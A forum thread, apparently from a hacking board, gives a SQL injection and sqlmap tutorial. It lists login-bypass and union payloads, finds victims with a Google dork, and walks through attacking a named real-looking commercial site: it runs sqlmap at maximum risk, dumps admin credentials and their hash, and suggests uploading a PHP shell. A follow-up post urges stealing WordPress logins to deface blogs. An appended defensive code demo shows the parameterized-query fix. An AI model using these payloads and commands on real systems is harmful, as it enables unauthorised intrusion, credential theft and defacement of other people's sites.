Sophie's basic SQL Injection and SQLmap tutorial.

  1. #1
    Sophie Pedophile Tech Support
    SQLi is pretty lulzy and SQLmap is dank as fuck. In this thread I'll teach you the basics of SQL injection and how to use SQLmap to hack into databases. Now if you want to be a proper web app pentester you should familiarize yourself with at least the basics of the various programming languages used in web app development, namely HTML, SQL, PHP, JavaScript and such. I'm not one to talk though, because I can't web dev for shit. Anyway, let's get to it.

    The oldest trick in the book is injecting this into a login form. Just type it into the form as the value for username and/or password.

    ' or ''='

    The reason why this works is as follows. Sometimes when you have a login form the input is checked against the columns in the database. So if username X and password X are found, TRUE is returned and you can log in. What this query does is force the database to return TRUE so you can log in even without using the proper credentials. Now you could also do this by using a comment operator. A query like that would look a little like this.

    ' or 1--

    The comment operator here is the double dash, so everything after that is not going to be executed. Server side it will look like this:

    select username,pass from users where username='' or true;

    Where or true is represented in the code as or 1, and the comment operator prevents anything from being executed after true;.

    Now you could also use a vulnerable form to check how many columns the query uses. The code you'd need to inject would look a little like this:

    ' order by 5--+-

    If the page returns an error that looks like this: Unknown column 5 in 'order clause', you'll know you have the wrong number of columns. Lower the number like so:


    ' order by 2--+-

    And if the page does not return an error you'll know the query uses at least 2 columns. You could also use union select to find out the server version, database name and a lot of other neat information. A query for finding out version and DB name will look a bit like this:


    ' union select version(),database()--+-

    The results will be displayed on the page. Anyway, all of this is injection via the POST method; if you want to use SQLmap for POST injection you're going to need to find out what the POST request looks like before you can tell SQLmap which parameters you want to try to inject. But I'll get into that later.

    Alright, so we covered the very basics of manual injection, now let's see how we can let SQLmap do all the work for us. First you'll need to get SQLmap of course. If you're not on Kali or BackBox then what the hell are you doing in this thread? Anyway, if you're on any other Linux distro it won't come preinstalled. Open up your terminal and type this.

    sudo apt-get install git

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

    Now cd to the proper directory. Once there, type python sqlmap.py to open it.

    Anyway, to hack a database you'll first need a victim site. To find one you use Google dorks; Google is your friend. Here's a quick dork for you: inurl:basket.php?id= Type that into Google and it will return a list of sites. Let's select the top one for now.

    http://www.vritikaherbotech.com/basket.php?id=5

    Ok, so what now? Now we'll want to see if we can execute queries by manipulating the URL. To do this we're going to try to purposefully have the database throw an error. We do this by adding %27 right after the value of 5 for the id parameter. %27 is the UTF-8 encoded apostrophe, in case you're wondering.

    http://www.vritikaherbotech.com/basket.php?id=5%27

    Click it and you'll see the following error messages.

    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/ascentwe/public_html/vritikaherbotech.com/basket.php on line 208

    Warning: Division by zero in /home/ascentwe/public_html/vritikaherbotech.com/basket.php on line 219

    Warning: Division by zero in /home/ascentwe/public_html/vritikaherbotech.com/basket.php on line 225

    Bingo, now we can point SQLmap in the direction of the site we found.

    cd to your SQLmap directory and type this into your terminal, passing the following arguments to SQLmap.

    python sqlmap -o --level=5 --risk=3 --random-agent --url=http://www.vritikaherbotech.com/basket.php?id=5 --priv-esc --current-user --tables

    I'll give you a quick run-down of the arguments used here for clarity. -o means 'turn all optimisation switches on'. --level is a little like --risk and will determine if SQLmap will use dangerous queries that might 505/500 internal server error the server. Obviously we don't give a shit about breaking the server, so go ahead and set everything to full throttle. --random-agent will make it so SQLmap selects a random user agent to be used when accessing the site so it looks less like a script. --priv-esc tries to elevate the current database user's privilege to root. --current-user will tell you which user you are when you get into the database, and --tables tells SQLmap to enumerate the tables of the databases found.

    Press enter and watch the magic happen. Green text will fill your terminal for a while and you can take this moment to feel like a 1337 ub4r h4xx0r. At some point SQLmap will tell you:

    GET parameter 'id' is vulnerable to injection so and so want to test for any other parameters? Y/N

    You're gonna press no, which will make SQLmap fire the payload needed to retrieve the tables. If you've been following this tutorial your output will look exactly like this.


    Noice, I see an interesting entry in the database called ascentwe_gmhat; if you look closely we have a table for admin. Obviously we want the admin credentials. Get them like this:

    python sqlmap -o --level=5 --risk=3 --random-agent --url=http://www.vritikaherbotech.com/basket.php?id=5 -D ascentwe_gmhat -T admin --dump

    Here's my output.

    Username:admin
    Password:21232f297a57a5a743894a0e4a801fc3

    Dehashing passwords is pretty easy; there are a number of online services and programs to help you out. It so happens that this password dehashes to 'admin', top fucking kek. Unfortunately these aren't the credentials needed for logging in to the administration section of the site, trust me, I checked. However we can see a number of other entries for 'admin' in the various databases. Go ahead and try to dump them.

    Also.

    If so, maybe the database management system user has write privilege to /www/var; if so, we might be able to upload a PHP shell and that means game fucking over. Also, observant readers will note I purposefully left out two tables in a specific database. If you want to, you can go ahead and try to find out which I left out. Consider it practice, trust me it will be worth it. But I'm gonna beat you to it.

    Also, if your injection method will be via POST you're going to need to intercept the POST request with an intercepting proxy like OWASP ZED. A general POST request for a login form might look like this:

    seed=&username=&password=

    Different requests will look different; you enter POST data into SQLmap by using this argument:

    --data="seed=&username=&password="

    Etcetera, happy hacking.
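An added example, not part of the original post, showing why the two login-form payloads above work and what stops them: the post's concatenated login query beside the same check with bound parameters, run against a constructed in-memory SQLite users table (assumed here in place of the MySQL one; the `users`/`pass` column names follow the post's server-side query).

```python
import sqlite3

# Constructed sample data standing in for the users table the post's
# login form checks against (one valid account).
SAMPLE_USERS = [("alice", "s3cret")]


def make_db():
    """Build an in-memory SQLite database holding the users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation, as in the post.

    The input is spliced into the SQL text, so a quote closes the string
    literal and `or ''=''` / `or 1--` rewrite the WHERE clause to be true.
    """
    sql = ("SELECT username, pass FROM users WHERE username='" + username
           + "' AND pass='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Same check with bound parameters: the driver sends the values apart
    from the SQL text, so quotes and `--` are treated as plain data."""
    sql = "SELECT username, pass FROM users WHERE username=? AND pass=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo():
    """Run the post's two payloads against both versions of the check.

    Returns {case: (concatenated_result, parameterized_result)}.
    """
    conn = make_db()
    cases = {
        "valid creds": ("alice", "s3cret"),
        "or ''='' in password": ("nobody", "' or ''='"),
        "or 1-- in username": ("' or 1--", "anything"),
    }
    return {name: (login_vulnerable(conn, u, p), login_parameterized(conn, u, p))
            for name, (u, p) in cases.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print(f"{name:22} concatenated={vuln!s:5} parameterized={safe}")
```

Only the valid credentials pass the parameterized check; both payloads log in through the concatenated one.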
  2. #2
    Sophie Pedophile Tech Support
    Also: WordPress credentials. Get them so you can change their blogs to goatse and shit.